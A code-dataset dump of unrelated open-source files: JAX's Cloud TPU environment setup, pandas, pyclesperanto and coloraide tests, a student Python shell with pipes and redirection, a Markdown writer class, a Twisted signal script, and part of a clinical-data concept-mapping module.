] | 2 | 2021-09-27T06:33:20.000Z | 2022-01-08T10:03:33.000Z | jax/_src/cloud_tpu_init.py | darshitsharma/jax | 90f926ac6b4962cfc23779b44e04202e22373f4d | [
"Apache-2.0"
] | null | null | null | jax/_src/cloud_tpu_init.py | darshitsharma/jax | 90f926ac6b4962cfc23779b44e04202e22373f4d | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
def cloud_tpu_init():
  """Automatically sets Cloud TPU topology and other env vars.

  **This must be called before the TPU runtime is loaded, which happens as soon
  as JAX's C++ backend is loaded! I.e. call this before xla_bridge or xla_client
  is imported.**

  Safe to call in non-Cloud TPU environments.

  Some of these environment variables are used to tell the TPU runtime what kind
  of mesh topology to use. It assumes a single-host topology by default, so we
  manually set them here to default to the full pod slice if applicable.

  This will not set any env vars if a single topology-related env var is already
  set.
  """
  try:
    # pylint: disable=import-outside-toplevel
    # pytype: disable=import-error
    import libtpu
    # pytype: enable=import-error
    # pylint: enable=import-outside-toplevel
  except ImportError:
    # We assume libtpu is installed iff we're in a correctly-configured Cloud
    # TPU environment. Exit early if we're not running on Cloud TPU.
    return

  libtpu.configure_library_path()
  os.environ.setdefault('GRPC_VERBOSITY', 'ERROR')

  # If the user has set any topology-related env vars, don't set any
  # automatically.
  if any([
      os.environ.get('CLOUD_TPU_TASK_ID', None),
      os.environ.get('TPU_CHIPS_PER_HOST_BOUNDS', None),
      os.environ.get('TPU_HOST_BOUNDS', None),
      os.environ.get('TPU_MESH_CONTROLLER_ADDRESS', None),
      os.environ.get('TPU_MESH_CONTROLLER_PORT', None),
      os.environ.get('TPU_VISIBLE_DEVICES', None),
  ]):
    return

  # pylint: disable=import-outside-toplevel
  # pytype: disable=import-error
  import requests
  import time
  # pytype: enable=import-error
  # pylint: enable=import-outside-toplevel

  # Based on https://github.com/tensorflow/tensorflow/pull/40317
  gce_metadata_endpoint = 'http://' + os.environ.get(
      'GCE_METADATA_IP', 'metadata.google.internal')

  def get_metadata(key):
    # Fetch an instance attribute from the GCE metadata server, retrying up
    # to 6 times on non-200 responses.
    retry_count = 0
    retrySeconds = 0.500
    api_resp = None

    while retry_count < 6:
      api_resp = requests.get(
          f'{gce_metadata_endpoint}/computeMetadata/v1/instance/attributes/{key}',
          headers={'Metadata-Flavor': 'Google'})
      # Bug fix: requests.Response exposes `status_code`, not `status`; the
      # original `api_resp.status` raised AttributeError on every response.
      if api_resp.status_code == 200:
        break
      retry_count += 1
      time.sleep(retrySeconds)

    # Robustness fix: the original only raised when api_resp was None, which
    # can't happen after the first iteration — now also fail when all retries
    # returned a non-200 response.
    if api_resp is None or api_resp.status_code != 200:
      raise RuntimeError(f"Getting metadata['{key}'] failed for 6 tries")
    return api_resp.text

  worker_id = get_metadata('agent-worker-number')
  accelerator_type = get_metadata('accelerator-type')

  accelerator_type_to_host_bounds = {
      'v2-8': '1,1,1',
      'v2-32': '2,2,1',
      'v2-128': '4,4,1',
      'v2-256': '4,8,1',
      'v2-512': '8,8,1',
      'v3-8': '1,1,1',
      'v3-32': '2,2,1',
      'v3-64': '2,4,1',
      'v3-128': '4,4,1',
      'v3-256': '4,8,1',
      'v3-512': '8,8,1',
      'v3-1024': '8,16,1',
      'v3-2048': '16,16,1',
  }

  os.environ['CLOUD_TPU_TASK_ID'] = worker_id

  # If v4 TPU don't set any topology related flags, libtpu will set these values.
  if not accelerator_type.startswith('v4-'):
    os.environ['TPU_CHIPS_PER_HOST_BOUNDS'] = '2,2,1'
    os.environ['TPU_HOST_BOUNDS'] = accelerator_type_to_host_bounds[
        accelerator_type]
| 32.834783 | 82 | 0.684587 |
0f6342aa62ac02b57610e7a0770e98ac22c3fd57 | 390 | py | Python | pandas/tests/io/sas/test_sas.py | robbuckley/pandas | aa7cb0138da6e20b356e8d9ae1f184e78a04189f | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/tests/io/sas/test_sas.py | robbuckley/pandas | aa7cb0138da6e20b356e8d9ae1f184e78a04189f | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/tests/io/sas/test_sas.py | robbuckley/pandas | aa7cb0138da6e20b356e8d9ae1f184e78a04189f | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | import pytest
from pandas.compat import StringIO
from pandas import read_sas
class TestSas(object):
    """Argument-validation tests for the top-level SAS reader."""

    def test_sas_buffer_format(self):
        # see gh-14947: a buffer with no explicit format is ambiguous, so
        # read_sas must refuse it with a clear error.
        buf = StringIO("")

        expected_msg = ("If this is a buffer object rather than a string "
                        "name, you must specify a format string")
        with pytest.raises(ValueError, match=expected_msg):
            read_sas(buf)
| 21.666667 | 65 | 0.633333 |
01e3727da95a7367f41b7450467b8cf4844cacbb | 720 | py | Python | tests/test_euclidean_distance_from_label_centroid_map.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 64 | 2020-03-18T12:11:22.000Z | 2022-03-31T08:19:18.000Z | tests/test_euclidean_distance_from_label_centroid_map.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 148 | 2020-05-14T06:14:11.000Z | 2022-03-26T15:02:31.000Z | tests/test_euclidean_distance_from_label_centroid_map.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 16 | 2020-05-31T00:53:44.000Z | 2022-03-23T13:20:57.000Z | import pyclesperanto_prototype as cle
import numpy as np
def test_euclidean_distance_from_label_centroid_map():
    """Each pixel's value must equal its distance to its label's centroid."""
    label_image = cle.push(np.asarray([
        [1, 1, 1, 2],
        [1, 1, 1, 2],
        [1, 1, 1, 2],
        [2, 2, 2, 2]
    ]))

    expected_map = cle.push(np.asarray([
        [1.4142135, 1, 1.4142135, 2.3079278],
        [1, 0, 1, 1.4285713],
        [1.4142135, 1, 1.4142135, 0.86896616],
        [2.3079278, 1.4285713, 0.86896616, 1.2121831]
    ]
    ))

    print(cle.centroids_of_background_and_labels(label_image))

    distance_map = cle.euclidean_distance_from_label_centroid_map(label_image)

    actual = cle.pull(distance_map)
    reference = cle.pull(expected_map)

    print(actual)
    print(reference)

    assert (np.allclose(actual, reference, 0.001))
| 23.225806 | 67 | 0.593056 |
0dcee3fb3280db406089e863d87edeaa552bed55 | 4,052 | py | Python | shell/lab1.py | utep-cs-systems-courses/os-shell-gavinbaechle | 71a4957b22a003894743a8564317c2275a7af902 | [
"BSD-3-Clause"
] | null | null | null | shell/lab1.py | utep-cs-systems-courses/os-shell-gavinbaechle | 71a4957b22a003894743a8564317c2275a7af902 | [
"BSD-3-Clause"
] | null | null | null | shell/lab1.py | utep-cs-systems-courses/os-shell-gavinbaechle | 71a4957b22a003894743a8564317c2275a7af902 | [
"BSD-3-Clause"
] | null | null | null | #r/bin/env python3
import os, sys, re
def inputHandler(args):
    """Dispatch one tokenized command line.

    Handles the builtins (exit, cd), then redirection ('<'/'>'), pipes
    ('|'), backgrounding ('&'), and finally fork+exec of an external
    program, waiting for the child unless backgrounded.
    """
    wait_child = True
    if len(args) == 0: # empty line: nothing to do, reprompt
        return
    if "exit" in args:
        sys.exit(0)
    # Here we are changing the directory
    elif "cd" == args[0]:
        try:
            if len(args)==1: # bare "cd" with no target: just reprompt
                return
            else:
                os.chdir(args[1])
        except: # target does not exist (or is not a directory)
            os.write(1, ("cd %s: No such file or directory\n" % args[1]).encode())
    elif '<' in args or '>' in args:
        reDir(args)
    elif '|' in args:
        pipe(args)
    elif '&' in args:
        # NOTE(review): this branch only clears wait_child and never forks,
        # so a command containing '&' is silently dropped — confirm intended.
        wait_child = False
    else:
        rc = os.fork()
        if rc < 0:
            os.write(2, ("fork failed, returning %d\n" % rc).encode())
            sys.exit(1)
        elif rc == 0:
            # Child: executeCommand only returns if exec failed; it exits
            # itself, so this sys.exit(0) is a safety net.
            executeCommand(args)
            sys.exit(0)
        else:
            if wait_child: # foreground command: wait for the child
                child_wait = os.wait()
def executeCommand(args): # Executes command
    """Replace the current (child) process with the requested program.

    If args[0] contains '/', it is exec'd as a path directly; otherwise
    each directory in $PATH is tried in order.  On success os.execve never
    returns; on failure an error is written to stderr and the process
    exits with a non-zero status.
    """
    if '/' in args[0]: # explicit path given: do not search $PATH
        prog = args[0]
        try:
            os.execve(prog, args, os.environ)
        except FileNotFoundError:
            pass # fall through to the error message below
        os.write(2, ("Could not exec. File not Found: %s\n" % args[0]).encode())
        sys.exit(1)
    for dir in re.split(":", os.environ['PATH']):
        program = "%s/%s" % (dir, args[0])
        try:
            os.execve(program, args, os.environ) # returns only on failure
        except FileNotFoundError:
            pass
    # error message
    os.write(2, ("%s: command not found\n" % args[0]).encode())
    # Bug fix: exit with the conventional "command not found" status (127)
    # instead of 0, which reported success for a failed lookup (the other
    # failure path above already exits non-zero).
    sys.exit(127)
def reDir(args):
    """Handle '<' / '>' redirection.

    Swaps fd 0 (for '<') or fd 1 (for '>') to the named file — os.open
    reuses the lowest free descriptor, i.e. the one just closed — then
    recurses for any further redirections and execs the command.

    NOTE(review): this runs in the shell process itself (no fork), so a
    successful exec replaces the shell; and the redirection filename stays
    in `args` passed to executeCommand — confirm both are intended.
    """
    if '<' in args: # input redirection
        leftProg = args[:args.index('<')]
        rightProg = args[args.index('<')+1:]
        os.close(0)
        os.open(rightProg[0], os.O_RDONLY)  # becomes fd 0
        os.set_inheritable(0, True)
        args.remove('<')
    else:
        leftProg = args[:args.index('>')]
        rightProg = args[args.index('>')+1:]
        os.close(1) # close output fd
        os.open(rightProg[0], os.O_CREAT | os.O_WRONLY)  # becomes fd 1
        os.set_inheritable(1, True)
        args.remove('>')
    if '<' in rightProg or '>' in rightProg:
        reDir(rightProg)
    executeCommand(args)
def pipe(args):
    #piping: 2 programs sharing info
    """Execute 'left | right'.

    Forks a child to run the left command with stdout on the pipe's write
    end; the parent wires stdin to the read end and (recursing for further
    '|') runs the right command.

    NOTE(review): the parent execs the right command itself, so a
    successful pipeline replaces the shell process — confirm intended.
    """
    leftProg = args[:args.index('|')]
    rightProg = args[args.index('|')+1:]
    pread, pwrite = os.pipe() # read end / write end of the pipe
    rc = os.fork() # child runs the left side
    if rc < 0:
        os.write(2, ('fork failed, returning %d\n'%rc).encode())
        sys.exit(1)
    elif rc == 0:
        os.close(1)
        os.dup(pwrite) # stdout now feeds the pipe (lowest free fd = 1)
        os.set_inheritable(1, True)
        for fd in (pread, pwrite):
            os.close(fd)
        executeCommand(leftProg) # left side of the pipe
        os.write(2, ('Execution Failed: %s\n' %leftProg[0]).encode())
        sys.exit(1)
    else:
        os.close(0)
        os.dup(pread) # stdin now reads from the pipe (lowest free fd = 0)
        os.set_inheritable(0, True)
        for fd in (pread, pwrite):
            os.close(fd)
        if '|' in rightProg:
            pipe(rightProg)
        executeCommand(rightProg) # right side of the pipe
        # only reached if exec failed
        os.write(2, ('Execution Failed: %s\n' %rightProg[0]).encode())
        sys.exit(1)
while True:  # REPL: prompt, read, dispatch, until end-of-file
    # Show the custom PS1 prompt when one is set, otherwise the default "$ ".
    os.write(1, os.environ.get('PS1', '$ ').encode())
    inpt = os.read(0, 1024)  # raw read of up to 1KB from stdin
    if not inpt:
        # os.read() reports EOF as empty bytes; it never raises EOFError,
        # so the original `except EOFError` handler was dead code and the
        # shell would re-prompt forever at end-of-input.  Exit instead.
        break
    for line in inpt.decode().split('\n'):
        if line.strip():  # skip blank lines and the trailing newline
            inputHandler(line.split())  # tokenize input and dispatch
| 27.564626 | 88 | 0.529615 |
e979fd7cb45f335eebef2014e0e5da308f10ca62 | 2,420 | py | Python | markdownWriter/markdownWriter.py | GonzaloRomeroR/markdown-generator | 60f44dcdc5400189c8bfc678b170922f00848e5e | [
"MIT"
] | null | null | null | markdownWriter/markdownWriter.py | GonzaloRomeroR/markdown-generator | 60f44dcdc5400189c8bfc678b170922f00848e5e | [
"MIT"
] | null | null | null | markdownWriter/markdownWriter.py | GonzaloRomeroR/markdown-generator | 60f44dcdc5400189c8bfc678b170922f00848e5e | [
"MIT"
class MarkdownWriter:
    """Incrementally writes Markdown elements (titles, text, links, images,
    tables) to a file, with optional bold/italic/code inline styling."""

    def __init__(self):
        # Inline styles applied by styleWords() to titles and text.
        self.bold = False
        self.italic = False
        self.code = False
        # When True, spacing() appends a newline after every element.
        self.autospacing = True

    def openFile(self, fileName):
        """Open (truncating) the output file; call before any write method."""
        self.file = open(fileName, 'w')

    def writeTitle(self, title, size):
        """Write a heading of level ``size`` (number of leading '#')."""
        title = self.styleWords(title)
        self.file.write('#' * size)
        self.file.write(title)
        self.spacing()

    def insertImage(self, imagePath):
        """Insert an image reference: ![image](imagePath)."""
        # NOTE(review): the opening literal was corrupted in the source;
        # reconstructed as standard Markdown image syntax -- confirm alt text.
        self.file.write("![image](")
        self.file.write(imagePath + ")")
        self.spacing()

    def writeText(self, text):
        """Write a styled run of text."""
        text = self.styleWords(text)
        self.file.write(text)
        self.spacing()

    def insertLink(self, text, URL):
        """Insert a hyperlink: [text](URL)."""
        self.file.write("[" + text + "](" + URL + ")")
        self.spacing()

    def closeFile(self):
        """Flush and close the output file."""
        self.file.close()

    def setBold(self, value):
        """Enable/disable bold styling for subsequent writes."""
        self.bold = bool(value)

    def setItalic(self, value):
        """Enable/disable italic styling for subsequent writes."""
        self.italic = bool(value)

    def setCode(self, value):
        """Enable/disable inline-code styling for subsequent writes."""
        self.code = bool(value)

    def styleWords(self, text):
        """Wrap ``text`` in the Markdown markers for every active style."""
        if self.code:
            text = "`" + text + "`"
        if self.bold:
            text = "**" + text + "**"
        if self.italic:
            text = "_" + text + "_"
        return text

    def setAutospacing(self, value):
        """Control automatic newline insertion after each element."""
        self.autospacing = value

    def insertSpace(self, number=1):
        """Insert ``number`` blank lines."""
        for _ in range(number):
            self.file.write("\n")

    def spacing(self):
        """Append a newline when autospacing is enabled."""
        if self.autospacing:
            self.file.write("\n")

    def insertMatrix(self, matrix):
        """Write a 2-D list as a Markdown table with index headers.

        Row indices appear bold in the first column; column indices form the
        header row.  Fix vs. original: the header loops iterated over the
        row count, producing a malformed table for non-square matrices.
        """
        rows = len(matrix)
        columns = len(matrix[0])
        self.file.write("||")
        for j in range(columns):
            self.file.write(str(j) + "|")
        self.file.write("\n")
        self.file.write("|---|")
        for j in range(columns):
            self.file.write("--- |")
        self.file.write("\n")
        for i in range(rows):
            self.file.write("|**" + str(i) + "**|")
            for j in range(columns):
                self.file.write(str(matrix[i][j]) + "|")
            self.file.write("\n")
def main():
    """Entry point placeholder; this module is intended to be imported."""
    pass


if __name__ == '__main__':
    main()
| 24.2 | 57 | 0.497521 |
f2ff108f85defca6a0f4ba79407bea609f4d6475 | 213 | py | Python | twisted/test/process_signal.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 267 | 2015-03-22T15:23:48.000Z | 2022-03-05T21:57:34.000Z | twisted/test/process_signal.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 133 | 2015-03-21T15:13:43.000Z | 2021-12-11T23:37:58.000Z | twisted/test/process_signal.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 119 | 2015-04-28T16:07:10.000Z | 2022-03-18T03:49:48.000Z | import sys, signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
if getattr(signal, "SIGHUP", None) is not None:
signal.signal(signal.SIGHUP, signal.SIG_DFL)
print 'ok, signal us'
sys.stdin.read()
sys.exit(1)
| 23.666667 | 48 | 0.741784 |
6642f49d17e5b917a19843ab85c6b385cf9306f9 | 3,862 | py | Python | tests/test_luv.py | facelessuser/coloraide | c273cb652f75941b95ad8ddc8becc9873b97f085 | [
"MIT"
] | 30 | 2020-10-11T05:47:51.000Z | 2022-03-22T06:05:33.000Z | tests/test_luv.py | facelessuser/coloraide | c273cb652f75941b95ad8ddc8becc9873b97f085 | [
"MIT"
] | 139 | 2020-10-20T15:28:57.000Z | 2022-03-31T23:44:18.000Z | tests/test_luv.py | facelessuser/coloraide | c273cb652f75941b95ad8ddc8becc9873b97f085 | [
"MIT"
] | 3 | 2021-08-29T13:25:12.000Z | 2021-12-22T19:58:11.000Z | """Test Luv library."""
import unittest
from . import util
from coloraide import Color
class TestLuvInputOutput(util.ColorAsserts, unittest.TestCase):
    """Test Luv parsing and serialization (the `color(--luv ...)` form)."""

    def test_input_raw(self):
        """Test raw input."""
        self.assertColorEqual(Color("luv", [20, 10, -30]), Color('color(--luv 20% 10 -30)'))

    def test_color_class(self):
        """Test raw input."""
        # Passing a Color instance to the constructor round-trips unchanged.
        self.assertColorEqual(Color(Color("luv", [20, 10, -30])), Color('color(--luv 20% 10 -30)'))

    def test_color(self):
        """Test color input/output format."""
        args = {"color": True}
        color = "color(--luv 20% 10 -30)"
        self.assertEqual(Color(color).to_string(**args), 'color(--luv 20% 10 -30)')
        color = "color(--luv 20% 10 -30 / 0.5)"
        self.assertEqual(Color(color).to_string(**args), 'color(--luv 20% 10 -30 / 0.5)')
        color = "color(--luv 20% 10 -30 / 50%)"
        # Percentage alpha serializes back as a decimal.
        self.assertEqual(Color(color).to_string(**args), 'color(--luv 20% 10 -30 / 0.5)')

    def test_percent(self):
        """Test that percents work properly."""
        color = "color(--luv 20% 10 -30 / 100%)"
        luv = Color(color)
        # A fully opaque alpha channel is omitted from the output.
        self.assertEqual("color(--luv 20% 10 -30)", luv.to_string())
        color = "color(--luv 20% 10 -30 / 20%)"
        luv = Color(color)
        self.assertEqual("color(--luv 20% 10 -30 / 0.2)", luv.to_string())

    def test_no_alpha(self):
        """Test no alpha."""
        color = "color(--luv 20% 10 -30 / 0.2)"
        luv = Color(color)
        self.assertEqual("color(--luv 20% 10 -30)", luv.to_string(alpha=False))

    def test_force_alpha(self):
        """Test force alpha."""
        color = "color(--luv 20% 10 -30 / 1)"
        luv = Color(color)
        self.assertEqual("color(--luv 20% 10 -30 / 1)", luv.to_string(alpha=True))

    def test_precision(self):
        """Test precision."""
        color = 'color(--luv 20.1234567% 10.1234567 -30.1234567)'
        self.assertEqual(Color(color).to_string(), 'color(--luv 20.123% 10.123 -30.123)')
        self.assertEqual(Color(color).to_string(precision=3), 'color(--luv 20.1% 10.1 -30.1)')
        self.assertEqual(Color(color).to_string(precision=0), 'color(--luv 20% 10 -30)')
        # precision=-1 requests the full double-precision decimal expansion.
        self.assertEqual(
            Color(color).to_string(precision=-1),
            'color(--luv 20.12345669999999842048055143095552921295166015625% 10.1234567000000001968373908312059938907623291015625 -30.12345669999999842048055143095552921295166015625)'  # noqa: E501
        )

    def test_fit(self):
        """Test fit."""
        # Luv is an unbounded space, so gamut fitting leaves the channel
        # values untouched regardless of the fit method requested.
        self.assertEqual(
            Color('color(--luv -20% 180 -180)').to_string(),
            'color(--luv -20% 180 -180)'
        )
        self.assertEqual(
            Color('color(--luv -20% 180 -180)').to_string(fit="clip"),
            'color(--luv -20% 180 -180)'
        )
        self.assertEqual(
            Color('color(--luv -20% 180 -180)').to_string(fit=False),
            'color(--luv -20% 180 -180)'
        )
class TestLuvProperties(util.ColorAsserts, unittest.TestCase):
    """Test read/write access to the Luv channel properties."""

    def test_lightness(self):
        """Test `lightness`."""
        c = Color('color(--luv 90% 50 -20 / 1)')
        self.assertEqual(c.lightness, 90)
        c.lightness = 80  # channel properties are mutable in place
        self.assertEqual(c.lightness, 80)

    def test_u(self):
        """Test `u`."""
        c = Color('color(--luv 90% 50 -20 / 1)')
        self.assertEqual(c.u, 50)
        c.u = 40
        self.assertEqual(c.u, 40)

    def test_v(self):
        """Test `v`."""
        c = Color('color(--luv 90% 50 -20 / 1)')
        self.assertEqual(c.v, -20)
        c.v = -10
        self.assertEqual(c.v, -10)

    def test_alpha(self):
        """Test `alpha`."""
        c = Color('color(--luv 90% 50 -20 / 1)')
        self.assertEqual(c.alpha, 1)
        c.alpha = 0.5
        self.assertEqual(c.alpha, 0.5)
341faf50dca4857c37527c1c40b676f716324865 | 17,274 | py | Python | django_harmonization/HeartData/migrate_functions.py | chrisroederucdenver/Kao-Harmonization-Release | 1a90db58cd378244a8aba138e27f049376045729 | [
"Apache-2.0"
] | null | null | null | django_harmonization/HeartData/migrate_functions.py | chrisroederucdenver/Kao-Harmonization-Release | 1a90db58cd378244a8aba138e27f049376045729 | [
"Apache-2.0"
] | null | null | null | django_harmonization/HeartData/migrate_functions.py | chrisroederucdenver/Kao-Harmonization-Release | 1a90db58cd378244a8aba138e27f049376045729 | [
"Apache-2.0"
] | null | null | null | '''
Copyright 2017 The Regents of the University of Colorado
Licensed under the Apache License, Version 2.0 (the "License")
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
migrate_functions.py
Python Version: 3.6.3
This is research code for demonstration purposes only.
These functions...
Q: How to denote that each function has a common signautre ???
Q: is it bad to include the return type of the function in the function name conflating functiong with return type?
I think I saw this in the identity fucntion where you need to have for each of the types of values
croeder 7/2017 chris.roeder@ucdenver.edu
croeder 9/2018 gutted, parameterized
croeder 4/2019 resurrected, stuff in person.py not parameterized yet
'''
import sys
import re
import psycopg2
import psycopg2.extras
from psycopg2.extras import RealDictCursor
import logging
import string
import traceback
logger = logging.getLogger(__name__)
def _lookup_concept_id(vocab_id, concept_code, con):
    """Return the OMOP concept_id for (vocabulary_id, concept_code), or None.

    Param vocab_id       vocabulary_id value in the OMOP concept table
    Param concept_code   concept_code value in the OMOP concept table
    Param con            a psycopg2 database connection
    Returns the first matching concept_id, or None when no row matches or
    the query fails (failure is logged, consistent with the rest of this
    module, instead of the original bare print()).
    """
    stmt = """ SELECT concept_id
        FROM concept c
        WHERE c.vocabulary_id = %s and c.concept_code = %s
    """
    with con.cursor() as cur:
        try:
            cur.execute(stmt, (vocab_id, concept_code))
            rows = cur.fetchall()
        except Exception as e:
            logger.error("Error in _lookup_concept_id %s %s %s", vocab_id, concept_code, e)
            return None
    if rows:
        return rows[0][0]
    return None
#############################################################################################
from HeartData.concepts import AFRICAN_AMERICAN_CONCEPT_ID
from HeartData.concepts import CAUCASIAN_CONCEPT_ID
from HeartData.concepts import ASIAN_CONCEPT_ID
from HeartData.concepts import PACIFIC_ISLANDER_CONCEPT_ID
from HeartData.concepts import AMERICAN_INDIAN_CONCEPT_ID
from HeartData.concepts import HISPANIC_CONCEPT_ID
from HeartData.concepts import OTHER_RACE_CONCEPT_ID
from HeartData.concepts import MALE_CONCEPT_ID
from HeartData.concepts import FEMALE_CONCEPT_ID
from HeartData.concepts import YES_CONCEPT_ID
from HeartData.concepts import NO_CONCEPT_ID
from HeartData.concepts import YES_CONCEPT_CODE
from HeartData.concepts import YES_VOCABULARY_ID
from HeartData.concepts import NO_CONCEPT_CODE
from HeartData.concepts import NO_VOCABULARY_ID
from HeartData.concepts import SMOKE_NEVER_CONCEPT_ID
from HeartData.concepts import SMOKE_CURRENT_CONCEPT_ID
from HeartData.concepts import SMOKE_SMOKELESS_CONCEPT_ID
from HeartData.concepts import SMOKE_FORMER_CONCEPT_ID
from HeartData.concepts import BARI2D_RACE_1_CONCEPT_ID
from HeartData.concepts import BARI2D_RACE_2_CONCEPT_ID
# ---- BEST -----
BEST_MALE=1
BEST_FEMALE = 2
BEST_YES=1
BEST_NO=2
# ---- HF-ACTION ---
HF_MEN=1
HF_WOMEN=2
# from the Data_Dictionary.pdf "1=Black, 2=White, 3=Asian, Amer Ind, Pac. Isl"
HF_AFRICAN_AMERICAN=1
HF_CAUCASIAN=2
HF_ASIAN=3
HF_AMERICAN_INDIAN=4
HF_PACIFIC_ISLANDER=5
HF_YES=1
HF_NO=0
HF_YES_12=1
HF_NO_12=2
# -- SCD-HeFT --
SH_YES=1
SH_NO=0
SH_MALE=1
SH_FEMALE=2
SH_AFRICAN_AMERICAN="African American"
SH_CAUCASIAN ="Caucasian"
SH_ASIAN="Asian"
SH_LATIN_AMERICAN ="Latin American"
SH_OTHER="Other"
# -- TOPCAT --
TC_YES=1
TC_NO=0
TC_MALE=1
TC_FEMALE=2
TC_CAUCASIAN =1
TC_AFRICAN_AMERICAN=2
TC_ASIAN=3
TC_OTHER=4
# -- PARADIGM --
P_YES=1
P_NO=0
P_MALE=1
P_FEMALE=2
P_CAUCASIAN =1
P_AFRICAN_AMERICAN=2
P_ASIAN=3
P_OTHER=4
## TBD: ATMOSPHERE TODO
A_CAUCASIAN =1
A_AFRICAN_AMERICAN=2
A_ASIAN=3
A_NATIVE_AMERICAN=7
A_PAC_ISLAND=8
A_OTHER=88
AIMHIGH_OTHER_RACE=8
AIMHIGH_WHITE_RACE=5
AIMHIGH_BLACK_RACE=3
AIMHIGH_ASIAN_RACE=2
AIMHIGH_AM_INDIAN_RACE=1
AIMHIGH_SMOKE_NEVER=1
AIMHIGH_SMOKE_CURRENT=2
AIMHIGH_SMOKELESS=3
AIMHIGH_SMOKE_FORMER=4
###########
# functions in this first batch are not used in migrate, rather by person.py.
# They are deprecated and need to be worked out of usage in person.py
###########
############################################################################################
"""
New function signature
param value - a single value of either number, string, or concept_id (??) type
param mapping - a StudyToOhdsiMapping object
param arguments - a StudyMappingArguments object
param con
"""
def true(_string_value, _mapping, _arguments, con):
    """
    Constant mapping function: always maps to the "Yes" concept.

    Param string_value, unused
    Param mapping, unused
    Param arguments, unused
    Param con, unused
    returns YES_CONCEPT_ID (the concept_id of True)
    """
    return YES_CONCEPT_ID
def identity(value, _mapping, _arguments, con):
    """
    Pass-through mapping function: the study value is used unchanged.

    Param value, returned as-is
    Param mapping, unused
    Param arguments, unused
    Param con, unused
    returns value
    """
    return value
def map_string(value, mapping, arguments, con):
    """ Converts a string value to a concept using rows from study_mapping_arguments.
        See also map_number() and map_concept() below.
    Param string_value
    Param mapping, the driving row from study_to_ohdsi_mapping describing the destination concept location in OMOP
    Param arguments, rows (in dict form) from study_mapping_arguments that match strings to concepts
    Param con, a psycopg2 database connnection
        rows: (string_value, number_value, concept_value, map_target, factor, shift)
    returns concept_id of vocabulary_id, concept_code of mapped value
    """
    concept_pair = None
    logger.info("migrate_functions.map_string value:%s mapping:%s", value, mapping)
    if (arguments and len(arguments) > 0):
        if value is None:
            return None
        for arg in arguments:
            # If several rows match, the last one wins.
            if value == arg['mapped_string']:
                concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
                print(" string --> ", value, arg['mapped_string'])  # NOTE(review): leftover debug print
        if (not concept_pair):
            logger.error("migrate_functions.map_string() I think your arguments list for a mapping isn't complete. Not able to map this value: \"%s\" arg:\"%s\" mapping:%s",
                value, arguments, mapping)
            return None
        else:
            try:
                return _lookup_concept_id(concept_pair[0], concept_pair[1], con)
            except Exception as e:
                logger.error("Concept matching query does not exist \"%s\" \"%s\" value:%s ", concept_pair[0], concept_pair[1], value)
                raise e
        return None  # unreachable: both branches above return or raise
    else:
        # No arguments configured at all: treated as a configuration error.
        logger.error("no arguments for migrate_functions.map_string(). mapping: %s, value: %s", mapping, value)
        raise Exception("migrate_functions.map_string() I think your arguments list for a mapping isn't complete. Not able to map this value: {} arg:{} map:{}".format( value, arguments, mapping))
def not_null_number(value, mapping, arguments, con):
    """
    A special case of map_number using the sentinel values -1 for null and 1 for non-null to map to two concepts
    specified by argument.vocabulary_id, argument.concept_code, and return the corresponding Concept object.
    Zero is a special case and requires a third argument. I would have given it the value for null, but the
    first time I applied this function, 0 counts as True.
    Param value is the value to map to a concept
    Param mapping is the row from study_to_ohdsi_mapping
    Param arguments, rows (in dict form) from study_mapping_arguments that match strings to concepts
    Param con, a psycopg2 database connnection
    returns concept id for true or false
    """
    concept_pair = None
    if (arguments and len(arguments) > 0):
        int_value = None
        try:
            int_value = int(value)
        except Exception as e:
            # value was None or non-numeric: int_value stays None (NULL case)
            pass
        for arg in arguments:
            if arg:
                arg_value = None
                try:
                    arg_value = int(arg['mapped_number'])
                except Exception as e:
                    logger.error("non integer value or mapped_number. None Returned. \"%s\", \"%s\" %s %s",
                        value, arg['mapped_number'], mapping, arguments)
                    return None
                print(" not null--> ", arg_value, int_value)  # NOTE(review): leftover debug print
                if int_value and int_value > 0 and arg_value == 1:
                    # POSITIVE: non-null positive value, matched by sentinel 1
                    concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
                elif int_value == 0 and arg_value == 0:
                    # ZERO: matched by sentinel 0 (counts as True per docstring)
                    concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
                elif not int_value and arg_value == -1:
                    # NULL: unparsable/missing value, matched by sentinel -1
                    concept_pair = (arg['to_concept_vocabulary_id'], arg['to_concept_code'])
                else:
                    logger.error("no null arg for migrate_functions.map_number(). Check Configuration. mapping: %s, value: %s", mapping, value)
